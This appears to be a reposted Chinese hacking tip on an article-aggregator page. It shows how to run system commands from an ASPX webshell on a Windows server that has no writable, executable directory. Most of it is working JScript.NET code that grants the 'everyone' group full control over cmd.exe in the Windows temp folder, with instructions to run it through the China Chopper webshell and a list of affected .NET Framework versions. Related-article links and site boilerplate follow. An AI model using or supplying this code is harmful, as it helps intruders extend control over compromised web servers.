aspxshell下突破無可寫可執行目錄執行cmd
try
{
var strPath:String = "c:\\windows\\temp\\cmd.exe", strUser:String = "everyone";
var dirinfo:System.IO.DirectoryInfo = new System.IO.DirectoryInfo(strPath);
var dirsecurity:System.Security.AccessControl.DirectorySecurity = dirinfo.GetAccessControl();
dirsecurity.AddAccessRule(new System.Security.AccessControl.FileSystemAccessRule(strUser,
System.Security.AccessControl.FileSystemRights.FullControl,
System.Security.AccessControl.AccessControlType.Allow));
dirinfo.SetAccessControl(dirsecurity);
Response.Write(strPath+"\t權限添加成功!");
}catch(x){Response.Write(x.Message);}
保存爲cmd.ccc,使用菜刀自寫腳本運行便可突破windows
受影響的版本爲:
Microsoft .NET Framework 2.0
Microsoft .NET Framework 3.5
Microsoft .NET Framework 3.5.1
Microsoft .NET Framework 4
Microsoft .NET Framework 4.5
Microsoft .NET Framework 4.5.1安全
利用條件:
1.須要支持aspx而且高於Microsoft .NET Framework 1.14版本
2.安全模式除外(如今尚未能突破.net安全模式的方法)
漏洞說明:該漏洞可直接賦予文件權限(讓沒權限的文件執行).net
相關文章
- 1. 當webshell不可執行cmshell時 (菜刀的安全模式!)可用此腳本突破執行cmd命令
- 2. 編寫可執行的jar
- 3. linux 讀寫可執行
- 4. cmd下執行mysql
- 5. Ubuntu下雙擊sh可執行文件無法執行
- 6. Windows下powershell可執行python
- 7. maven 可執行jar
- 8. sdcard不可執行.
- 9. 可執行文件
- 10. 執行Sysprep(可選)
- 更多相關文章...
- • MyBatis SqlSession和Mapper接口執行Sql - MyBatis教程
- • Redis主從複製的配置方法和執行過程 - Redis教程
- • Git可視化極簡易教程 — Git GUI使用方法
- • Docker容器實戰(七) - 容器眼光下的文件系統
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
歡迎關注本站公眾號,獲取更多信息
相關文章